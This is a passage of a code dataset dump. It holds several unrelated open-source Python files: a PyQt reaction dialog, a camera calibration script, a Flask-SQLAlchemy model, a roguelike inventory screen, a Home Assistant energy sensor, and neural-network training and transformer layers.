those group boxes\n self._grid = QGridLayout()\n self._grid.addWidget(self._reactantbox, 0, 0)\n self._grid.addWidget(self._productbox, 0, 1)\n self._grid.addWidget(self._rightbox, 0, 2)\n self._grid.addWidget(self._okbtn, 1, 1)\n self._grid.addWidget(self._cancelbtn, 1, 2)\n self.setLayout(self._grid)\n\n if reaction is None:\n self._reaction = Reaction()\n else:\n self._reaction = reaction\n\n self._okbtn.clicked.connect(self.close)\n self._cancelbtn.clicked.connect(self.close)\n self.exec_()\n\n def ApplyChanges(self):\n errorlist = []\n # Validation goes here later\n if len(errorlist) == 0:\n for x in range(Reaction.REACTING_SPECIES_LIMIT):\n self._reaction.GetReactants()[x].SetFormula(self._reactantinfoboxes[x*2].text())\n self._reaction.GetReactants()[x].SetInitialMoles(float(str(self._reactantinfoboxes[x*2+1].text())))\n self._reaction.GetProducts()[x].SetFormula(self._productinfoboxes[x*2].text())\n self._reaction.GetProducts()[x].SetInitialMoles(float(str(self._productinfoboxes[x*2+1].text())))\n self._reaction.GetCatalyst().SetFormula(self._catalystinfoboxes[0].text())\n self._reaction.GetCatalyst().SetInitialMoles(float(str(self._catalystinfoboxes[1].text())))\n self._reaction.GetCatalyst().SetEaChangePerMole(int(str(self._catalystinfoboxes[2].text())))\n self._reaction.SetTemperature(int(self._tempbox.text()))\n self._reaction.SetVolume(float(self._volbox.text()))\n\n def GetReaction(self):\n if self._CanReturnReaction:\n return self._reaction\n\n def close(self):\n self._CanReturnReaction = True\n super(ConditionsDialog, self).close()","repo_name":"fredtargaryen/eqmsim2015","sub_path":"Equilibrium Simulator 2015/PROTOTYPE/gui/ConditionsDialog.py","file_name":"ConditionsDialog.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3337621308","text":"import logging\nimport os\nimport sys\nimport random\nimport pandas as pd\nfrom utils import calibrate, get_detectors\n\nlogging.basicConfig(level=logging.INFO, filename='calib.log', filemode='w')\nLOGGER = logging.getLogger(__name__)\nLOGGER.addHandler(logging.StreamHandler()) \n\n# Folder where calibraiton data is\ndata_dir = sys.argv[1]\n\ncharuco_rig = {\"dir\": \"charuco_rig\", \"pattern\": \"charuco\"}\ndots_rig = {\"dir\": \"dots_rig\", \"pattern\": \"dots\"}\ncharuco_freehand = {\"dir\": \"charuco_freehand\", \"pattern\": \"charuco\"}\ndots_freehand = {\"dir\": \"dots_freehand\", \"pattern\": \"dots\"}\n\n#TODO: Get rid of iterative option?\nis_iterative = False\nfor dataset in [dots_freehand, charuco_freehand, charuco_rig, dots_rig]:\n\n directory = os.path.join(data_dir, dataset[\"dir\"])\n\n if not os.path.exists(directory):\n LOGGER.info(\"Directory doesn't exist: %s, skipping\", directory)\n continue\n\n pattern = dataset[\"pattern\"]\n \n LOGGER.info(f'Processing dataset: {dataset}')\n\n calibrations = os.listdir(directory)\n \n # Loop over every set of collected images and use each for precalibration,\n # then calibrate on the rest. This takes a long time!\n\n\n left_point_detector, right_point_detector, iterative_image_file = \\\n get_detectors(pattern, is_iterative)\n\n for i, calib_set in enumerate(calibrations):\n stereo_reproj_errors = []\n stereo_recon_errors = []\n tracked_reproj_errors = []\n tracked_recon_errors = []\n calib_times = []\n frame_grab_times = []\n successful_dirs = []\n\n # Split into precalib set and the rest\n precalibration_data = calibrations[i]\n test_data = (c for j, c in enumerate(calibrations) if j != i)\n\n LOGGER.info(f\"Using {precalibration_data} for precalibration\")\n\n full_path = os.path.join(directory, precalibration_data)\n\n stereo_reproj_err, stereo_recon_err, tracked_reproj_err, \\\n tracked_recon_err, elapsed_time, mean_frame_grabbing_time, \\\n stereo_params = calibrate(left_point_detector,\n right_point_detector,\n full_path)\n\n LOGGER.info(f\"Stereo Reprojection Error: {stereo_reproj_err}\")\n LOGGER.info(f\"Stereo Reconstruction Error: {stereo_recon_err}\")\n LOGGER.info(f\"Tracked Reprojection Error: {tracked_reproj_err}\")\n LOGGER.info(f\"Tracked Reconstruction Error: {tracked_recon_err}\")\n LOGGER.info(f\"Calibration took: {elapsed_time} seconds\")\n\n for calibration in test_data:\n LOGGER.info(f\"Calibrating {calibration}\")\n\n try:\n full_path = os.path.join(directory, calibration)\n \n stereo_reproj_err, stereo_recon_err, tracked_reproj_err, \\\n tracked_recon_err, elapsed_time, mean_frame_grabbing_time, \\\n stereo_params = calibrate(left_point_detector,\n right_point_detector,\n full_path,\n stereo_params)\n\n LOGGER.info(f\"Stereo Reprojection Error: {stereo_reproj_err}\")\n LOGGER.info(f\"Stereo Reconstruction Error: {stereo_recon_err}\")\n LOGGER.info(f\"Tracked Reprojection Error: {tracked_reproj_err}\")\n LOGGER.info(f\"Tracked Reconstruction Error: {tracked_recon_err}\")\n LOGGER.info(f\"Calibration took: {elapsed_time} seconds\")\n\n stereo_reproj_errors.append(stereo_reproj_err)\n stereo_recon_errors.append(stereo_recon_err)\n tracked_reproj_errors.append(tracked_reproj_err)\n tracked_recon_errors.append(tracked_recon_err)\n calib_times.append(elapsed_time)\n frame_grab_times.append(mean_frame_grabbing_time)\n\n successful_dirs.append(calibration)\n\n except Exception as ex:\n LOGGER.error(f\"Error processing {full_path}\")\n LOGGER.error(ex)\n\n labels = [\"Reproj.\", \"Recon.\", \"Tracked Reproj.\", \"Tracked Recon.\", \\\n \"Mean Frame Grab Time\", \"Mean Calibration Time\"]\n\n df = pd.DataFrame([stereo_reproj_errors,\n stereo_recon_errors,\n tracked_reproj_errors,\n tracked_recon_errors,\n frame_grab_times,\n calib_times\n ],\n index=labels,\n columns=successful_dirs).transpose()\n\n output_dir = f'results/precalib/{dataset[\"dir\"]}'\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n filename = f'{ dataset[\"dir\"]}-precalib-{calibrations[i]}.csv'\n\n if is_iterative:\n filename = f'{ dataset[\"dir\"]}-precalib-{calibrations[i]}-iterative.csv'\n\n output_path = os.path.join(output_dir, filename)\n df.to_csv(output_path)\n\n LOGGER.info(df)\n\n","repo_name":"UCL/WEISS_Calibration_Study","sub_path":"precalibration.py","file_name":"precalibration.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4050388012","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\nfrom datetime import datetime\n\n\nclass Post(db.Model):\n __tablename__ = \"posts\"\n\n if environment == \"production\":\n __table_args__ = {'schema': SCHEMA}\n\n id = db.Column(db.Integer, primary_key=True)\n wall_id = db.Column(db.Integer, db.ForeignKey(\n add_prefix_for_prod(\"users.id\")), nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(\n add_prefix_for_prod(\"users.id\")), nullable=False)\n content = db.Column(db.Text, nullable=False)\n image = db.Column(db.String)\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n\n\n #Relationships\n user_destination = db.relationship(\"User\", back_populates=\"posts_destination\", foreign_keys=[wall_id])\n user_author = db.relationship(\"User\", back_populates=\"posts_author\", foreign_keys=[user_id])\n comments = db.relationship(\"Comment\", back_populates=\"post\", cascade=\"all, delete\")\n likes = db.relationship(\"Like\", back_populates=\"post\", cascade=\"all, delete\")\n\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict()\n }\n\n def to_dict_with_comments(self):\n test = [ele.to_dict_with_user() for ele in self.comments]\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict(),\n \"Comments\": test,\n \"Comments_Count\": len(test),\n }\n\n def to_dict_with_comments_likes(self):\n test = [ele.to_dict_with_user() for ele in self.comments]\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict(),\n \"Comments\": test,\n \"Comments_Count\": len(test),\n \"Like_Count\": len(self.likes)\n }\n","repo_name":"calvintzeng96/Tzengbook","sub_path":"app/models/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"70120210711","text":"#Basic Calc2 to junior users\n#Developer: Alex Basante\n\n#Libraries#########################\nimport os\n###################################\n\n\n#Funtions#########################\ndef calc(x, y):\n suma= x + y\n print(\"La suma es: \", suma)\n \n#Main######################### \nos.system(\"clear\") \nprint(\"Press number 1: \")\na=int(input())\n\nb=int(input(\"Presss number 2: \"))\n\ncalc(a,b)","repo_name":"Alexb2322/appTest7","sub_path":"basic_calc2.py","file_name":"basic_calc2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37198268183","text":"from enum import Enum\n\nimport tcod\n\nfrom input import InputType\nfrom messages.messages import get_message\nfrom render import screen_width, screen_height\nfrom scene.generic_scene import GenericScene\n\n\nclass InventoryMode(Enum):\n USE = 1\n DESCRIPTION = 2\n DROP = 3\n\n\nclass InventoryScene(GenericScene):\n def __init__(self, player, previous_scene=None, mode=InventoryMode.DESCRIPTION):\n super().__init__()\n self.player = player\n self.previous_scene = previous_scene\n self.mode = mode\n self.item = None\n self.console = tcod.console_new(screen_width, screen_height)\n tcod.console_set_default_foreground(self.console, tcod.white)\n tcod.console_set_default_background(self.console, tcod.black)\n\n def manage_input(self, game_input):\n super_input = super().manage_input(game_input)\n if super_input is not None:\n if super_input['action'] == 'cancel' and self.item is not None:\n self.item = None\n self.render_next = True\n return None\n return super_input\n\n if game_input is None:\n return None\n\n if game_input.type == InputType.CHAR:\n if game_input.value == '?':\n if self.mode == InventoryMode.USE:\n self.mode = InventoryMode.DESCRIPTION\n elif self.mode == InventoryMode.DESCRIPTION:\n self.mode = InventoryMode.DROP\n else:\n self.mode = InventoryMode.USE\n elif (ord('a') <= ord(game_input.value) <= ord('z')) \\\n or (ord('A') <= ord(game_input.value) <= ord('Z')):\n item = self.player.entity.inventory.get_item_at_char(game_input.value)\n if item is not None:\n if self.mode == InventoryMode.DESCRIPTION:\n self.item = item\n elif self.mode == InventoryMode.USE and item.usable:\n item.use()\n self.player.entity.inventory.remove_item(item)\n self.player.entity.reset_turn(100)\n return {'action': 'cancel'}\n elif self.mode == InventoryMode.DROP:\n self.player.entity.inventory.drop_item(item)\n self.player.entity.reset_turn(100)\n return {'action': 'cancel'}\n\n self.render_next = True\n return None\n\n def render(self, console):\n if not self.render_next:\n return\n tcod.console_clear(self.console)\n\n if self.item is None:\n self.render_list()\n\n tcod.console_blit(self.console, 0, 0, screen_width, screen_height, 0, 0, 0)\n\n def render_list(self):\n tcod.console_set_default_foreground(self.console, tcod.white)\n if self.mode == InventoryMode.DESCRIPTION:\n message = get_message('inventory.description')\n elif self.mode == InventoryMode.DROP:\n message = get_message('inventory.drop')\n else:\n message = get_message('inventory.use')\n tcod.console_print_ex(\n self.console,\n 1,\n 1,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message\n )\n\n index = 0\n for item in self.player.entity.inventory.items:\n letter_index = ord('a') + index\n if letter_index > ord('z'):\n letter_index = ord('A') + index - 26\n\n if item.usable or self.mode != InventoryMode.USE:\n color = item.get_color()\n message = '{0}) {1}'\n else:\n color = tcod.dark_grey\n message = ' {1}'\n\n tcod.console_set_default_foreground(self.console, color)\n tcod.console_print_ex(\n self.console,\n 2,\n 3 + index,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message.format(chr(letter_index), item.get_name())\n )\n index += 1\n\n if self.mode == InventoryMode.DESCRIPTION:\n message = get_message('inventory.switch_mode.drop')\n elif self.mode == InventoryMode.DROP:\n message = get_message('inventory.switch_mode.use')\n else:\n message = get_message('inventory.switch_mode.description')\n\n tcod.console_set_default_foreground(self.console, tcod.desaturated_green)\n tcod.console_print_ex(\n self.console,\n 1,\n 55,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message.format('?')\n )\n\n def render_clean(self, console):\n if not self.render_next:\n return\n tcod.console_clear(self.console)\n self.render_next = False\n","repo_name":"gbouchez/roguemonsters","sub_path":"scene/inventory_scene.py","file_name":"inventory_scene.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23251944256","text":"from .utils import Answer\n\nvalues = [\"=\", \"-\", \"0\", \"1\", \"2\"]\n\ndef snafu2int(s: str):\n return sum(\n (values.index(c) - 2) * (5 ** i)\n for i, c in enumerate(reversed(s))\n )\n\ndef int2snafu(i: int) -> str:\n ret = ''\n while i:\n m = i % 5\n i //= 5\n if m > 2: # carry\n m -= 5\n i += 1\n ret = values[m+2] + ret\n return ret\n\ndef solve(input: str):\n total = sum(map(snafu2int, input.split()))\n part1 = int2snafu(total)\n return Answer(part1, 0)\n","repo_name":"barnybug/aoc2022","sub_path":"aoc2022/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9473866574","text":"import shutil\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport os\n\n\ndef save_checkpoint(state, is_best, best_prec1, save_dir='.', suffix=''):\n \"\"\"\n Save the training self.model\n \"\"\"\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n filename = \"{}/checkpoint{}.pth.tar\".format(save_dir, suffix)\n torch.save(state, filename)\n\n if is_best:\n shutil.copyfile(filename, '{}/model_best{}_acc_{:.4f}.pth.tar'.format(save_dir, suffix,best_prec1))\n\n\ndef rm_checkpoints(save_dir):\n for f_name in os.listdir(save_dir):\n if \"checkpoint\" in f_name and \".pth.tar\" in f_name:\n os.remove(os.path.join(save_dir, f_name))\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.values = []\n\n def update(self, val, n=1):\n self.values += [val]\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def get_var(self):\n return np.var(self.values)\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef loss_fn(outputs, labels):\n \"\"\"\n Compute the cross entropy loss given outputs and labels.\n Args:\n outputs: (Variable) dimension batch_size x 6 - output of the model\n labels: (Variable) dimension batch_size, where each element is a value in [0, 1, 2, 3, 4, 5]\n Returns:\n loss (Variable): cross entropy loss for all images in the batch\n Note: you may use a standard loss function from http://pytorch.org/docs/master/nn.html#loss-functions. This example\n demonstrates how you can easily define a custom loss function.\n \"\"\"\n return nn.CrossEntropyLoss()(outputs, labels)\n\n\ndef loss_fn_kd(outputs, labels, teacher_outputs, params):\n \"\"\"\n Compute the knowledge-distillation (KD) loss given outputs, labels.\n \"Hyperparameters\": temperature and alpha\n NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher\n and student expects the input tensor to be log probabilities! See Issue #2\n \"\"\"\n alpha = params.alpha\n T = params.temperature\n KD_loss = nn.KLDivLoss()(F.log_softmax(outputs / T, dim=1),\n F.softmax(teacher_outputs / T, dim=1)) * (alpha * T * T) + \\\n F.cross_entropy(outputs, labels) * (1. - alpha)\n\n return KD_loss\n\n\ndef l1_penalty(scaler_params):\n '''\n Args:\n scales - diagonal matrix, which contains weight coefficients for branches in ResNeXt block\n '''\n l1 = torch.mean(torch.tensor([torch.abs(v).sum() for v in scaler_params.values()]))\n return l1\n\n\ndef adjust_learning_rate(optimizer, epoch, lr0=None):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n\n lr = lr0 * (0.99 ** (epoch // 30))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef validate(val_loader, model, device='cuda',\n iters=10 ** 7, suffix='', prefix=\"Test\",\n loggs_dir=None, print_every=10):\n \"\"\"\n Run evaluation\n \"\"\"\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n criterion = torch.nn.CrossEntropyLoss().to(device)\n\n # switch to evaluate mode\n model.to(device)\n model.eval()\n\n with torch.no_grad():\n for i, (input, target) in enumerate(val_loader):\n iter_no = i + 1\n input = input.to(device)\n target = target.to(device)\n\n # compute output\n begin = time.time()\n output = model(input)\n batch_time.update(time.time() - begin)\n\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n print_info = ''.join(['{0}: [{1}/{2}]\\t',\n 'ElapsedTime {batch_time.val:.6f} ({batch_time.avg:.6f})\\t',\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t',\n 'Prec@1 {top1.val:.6f} ({top1.avg:.6f})\\t',\n 'Prec@5 {top5.val:.6f} ({top5.avg:.6f})\\n']).format(prefix,\n iter_no * len(input),\n len(val_loader.sampler),\n batch_time=batch_time,\n loss=losses,\n top1=top1,\n top5=top5)\n\n if loggs_dir is not None:\n loggs_file = '{}/val_loggs{}.txt'.format(loggs_dir, suffix)\n with open(loggs_file, 'a') as f:\n f.write(print_info)\n\n if i % 100 == 0:\n print('Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n loss=losses,top1=top1, top5=top5))\n\n print(' * Prec@1 {top1.avg:.6f} Prec@5 {top5.avg:.6f}'\n .format(top1=top1, top5=top5))\n\n return top1.avg, top5.avg, losses.avg\n\n\ndef train(train_loader, model, teacher_model,\n optimizer, epoch, kd_params=None,\n device='cuda', iters=10 ** 7, add_l1_penalty=False,\n suffix='', loggs_dir=None, print_every=20):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to train mode\n model.to(device)\n model.train()\n\n if kd_params is not None:\n teacher_model.to(device)\n teacher_model.eval()\n\n for i, (input, target) in enumerate(train_loader):\n iter_no = i + 1\n\n input = input.to(device)\n target = target.to(device)\n\n # compute output\n begin = time.time()\n output = model(input)\n\n if kd_params is not None:\n teacher_output = teacher_model(input)\n loss = loss_fn_kd(output, target, teacher_output, kd_params) + loss_fn(output, target)\n else:\n loss = loss_fn(output, target)\n\n scaler_params = {k: v for k, v in dict(model.named_parameters()).items() if k.endswith('scaler.weight')}\n l1_loss = l1_penalty(scaler_params)\n\n\n\n\n if add_l1_penalty:\n loss = loss + 0.0001 * l1_loss\n\n batch_time.update(time.time() - begin)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n print_info = ''.join(['Epoch: [{0}][{1}/{2}]\\t',\n 'ElapsedTime {batch_time.val:.6f} ({batch_time.avg:.6f})\\t',\n 'LoadingTime {data_time.val:.6f} ({data_time.avg:.6f})\\t',\n 'Loss {loss.val:.6f} ({loss.avg:.6f})\\t',\n 'Prec@1 {top1.val:.6f} ({top1.avg:.6f})\\t',\n 'Prec@5 {top5.val:.6f} ({top5.avg:.6f})\\n']).format(epoch ,\n (i + 1) * len(input),\n len(train_loader.sampler),\n batch_time=batch_time,\n data_time=data_time,\n loss=losses,\n top1=top1,\n top5=top5)\n if loggs_dir is not None:\n loggs_file = '{}/train_loggs{}.txt'.format(loggs_dir, suffix)\n with open(loggs_file, 'a') as f:\n f.write(print_info)\n\n if i % 100 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, (i+1)*len(input), len(train_loader.sampler), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n","repo_name":"chatzikon/DNN-COMPRESSION","sub_path":"ilscvr/step2/tensor_compression/train_validate.py","file_name":"train_validate.py","file_ext":"py","file_size_in_byte":9877,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"37405823109","text":"\"\"\"\n@ Author : Gerben Jongerius, Paul de Wit, Robin Harmsen\n@ Date : 04/29/2018, 11/01/2018, 04/29/2019\n@ Description : Youless Sensor - Monitor power consumption. \n\"\"\"\nVERSION = '2.0.1'\n\nimport json\nimport logging\nfrom datetime import timedelta\nfrom urllib.request import urlopen\n\nimport voluptuous as vol\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import CONF_MONITORED_VARIABLES\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\n\nDOMAIN = 'youless'\nCONF_HOST = \"host\"\n\nSENSOR_PREFIX = 'youless_'\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_MONITORED_VARIABLES, default=['pwr', 'net']): vol.All(\n cv.ensure_list, vol.Length(min=1), [vol.In(['pwr', 'net', 'p1', 'p2', 'n1', 'n2', 'cs0', 'ps0', 'gas'])])\n })\n}, extra=vol.ALLOW_EXTRA)\n\nSENSOR_TYPES = {\n 'pwr': ['Current Power usage', 'current_power_usage', 'W', 'mdi:flash', 'energy.png'],\n 'net': ['Net Power usage', 'net_power_meter', 'kWh', 'mdi:gauge', 'electric-meter.png'],\n 'p1': ['Power Meter Low', 'power_meter_low', 'kWh', 'mdi:gauge', 'energy.png'],\n 'p2': ['Power Meter High', 'power_meter_high', 'kWh', 'mdi:gauge', 'energy.png'],\n 'n1': ['Power Delivery Low', 'power_delivery_low', 'kWh', 'mdi:gauge', 'energy.png'],\n 'n2': ['Power Delivery High', 'power_delivery_high', 'kWh', 'mdi:gauge', 'energy.png'],\n 'cs0': ['Power Meter Extra', 'power_meter_extra', 'kWh', 'mdi:gauge', 'energy.png'],\n 'ps0': ['Current Power usage Extra', 'current_power_usage_extra', 'W', 'mdi:flash', 'energy.png'],\n 'gas': ['Gas consumption', 'gas_meter', 'm3', 'mdi:gas-cylinder', 'electric-meter.png']\n}\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n host = config.get(CONF_HOST)\n sensors = config.get(CONF_MONITORED_VARIABLES)\n data_bridge = YoulessDataBridge(host)\n\n devices = []\n for sensor in sensors:\n sensor_config = SENSOR_TYPES[sensor]\n devices.append(YoulessSensor(data_bridge, sensor_config[0], sensor, sensor_config[1], sensor_config[2], sensor_config[3], sensor_config[4]))\n\n add_devices(devices)\n\n\nclass YoulessDataBridge(object):\n\n def __init__(self, host):\n self._url = 'http://' + host + '/e'\n self._data = None\n\n def data(self):\n return self._data\n\n @Throttle(timedelta(seconds=1))\n def update(self):\n raw_res = urlopen(self._url)\n self._data = json.loads(raw_res.read().decode('utf-8'))[0]\n\n\nclass YoulessSensor(Entity):\n\n def __init__(self, data_bridge, name, prpt, sensor_id, uom, icon, image_uri):\n self._state = None\n self._name = name\n self._property = prpt\n self._icon = icon\n #self._image = image_uri\n self._uom = uom\n self._data_bridge = data_bridge\n self.entity_id = 'sensor.' + SENSOR_PREFIX + sensor_id\n self._raw = None\n\n @property\n def name(self):\n return self._name\n\n @property\n def icon(self):\n return self._icon\n\n #@property\n #def entity_picture(self):\n # return '/local/youless/' + self._image\n\n @property\n def unit_of_measurement(self):\n return self._uom\n\n @property\n def state(self):\n return self._state\n\n @property\n def state_attributes(self):\n if self._raw is not None:\n return {\n 'timestamp': self._raw['tm']\n }\n\n def update(self):\n self._data_bridge.update()\n self._raw = self._data_bridge.data()\n if self._raw is not None:\n self._state = self._raw[self._property]\n","repo_name":"lubbertkramer/home_assistant_config","sub_path":"custom_components/youless/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"4280512033","text":"from model.Extractor import FeaturesExtractor\nfrom typing import Optional, NewType\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\nfrom torch.nn import Dropout, LayerNorm, Linear\n\nfrom model.MultiHeadedAttention import MultiHeadedAttention, multiLinear, clones\nfrom model.PositionalEncoding import PositionalEncodingNd\nfrom model.TokenEmbedding import TokenEmbedding\n\n\nPAD_ID = 0\npretrained = \"model weights\"\n\nclass EncoderLayer(nn.Module):\n '''\n\n '''\n def __init__(self, d_model: int, nhead: int, dim_feedforward: int=2048, dropout: float=0.1, activation: str=\"relu\"):\n super(EncoderLayer, self).__init__()\n self.self_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = LayerNorm(d_model)\n self.norm2 = LayerNorm(d_model)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu(inplace=True)\n super(EncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_padding_mask: Optional[Tensor] = None) -> Tensor:\n \"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n src2 = self.self_attn(src, src, src, pos_mask=src_mask, padding_mask=src_padding_mask)\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super(DecoderLayer, self).__init__()\n\n self.d_model = d_model\n\n self.self_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n self.src_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n\n # (tgt, tgt, tgt)\n self.self_attn_linears = multiLinear(d_model=d_model, num=3)\n # (tgt, memory, memory)\n self.src_attn_linears = multiLinear(d_model=d_model, num=3)\n self.self_attn_memory = None\n self.src_attn_memory = None\n\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout, inplace=True)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = LayerNorm(d_model)\n self.norm2 = LayerNorm(d_model)\n self.norm3 = LayerNorm(d_model)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu(inplace=True)\n super(DecoderLayer, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, \n tgt_mask: Optional[Tensor] = None, tgt_paddingg_mask: Optional[Tensor] = None, \n memory_mask: Optional[Tensor] = None, memory_padding_mask: Optional[Tensor] = None,\n decode_mem: Optional[list] = None) -> Tensor:\n '''\n :param tgt: target. shape: (barch_size, max_len, d_model)\n '''\n if decode_mem is not None:\n memk1, memv1, memk2, memv2 = decode_mem\n\n q, k, v = self.self_attn_linears(tgt, tgt, tgt)\n if decode_mem is not None:\n k, v = [torch.cat((x, y), dim=1) for x, y in zip([memk1, memv1], [k, v])]\n self.self_attn_memory = [k, v]\n tgt2 = self.self_attn(q, k, v, pos_mask=tgt_mask, padding_mask=tgt_paddingg_mask)\n\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n q, k, v = self.src_attn_linears(tgt, memory, memory)\n if decode_mem is not None:\n k, v = [torch.cat((x, y), dim=1) for x, y in zip([memk2, memv2], [k, v])]\n self.src_attn_memory = [k, v]\n tgt2 = self.src_attn(q, k, v, pos_mask=memory_mask, padding_mask=memory_padding_mask)\n\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def clear_cache(self):\n self.self_attn_memory = None\n self.src_attn_memory = None\n\n def init_decode_memory(self, memory: Tensor, device) -> 'list[Tensor]':\n batch_size = memory.shape[0]\n return 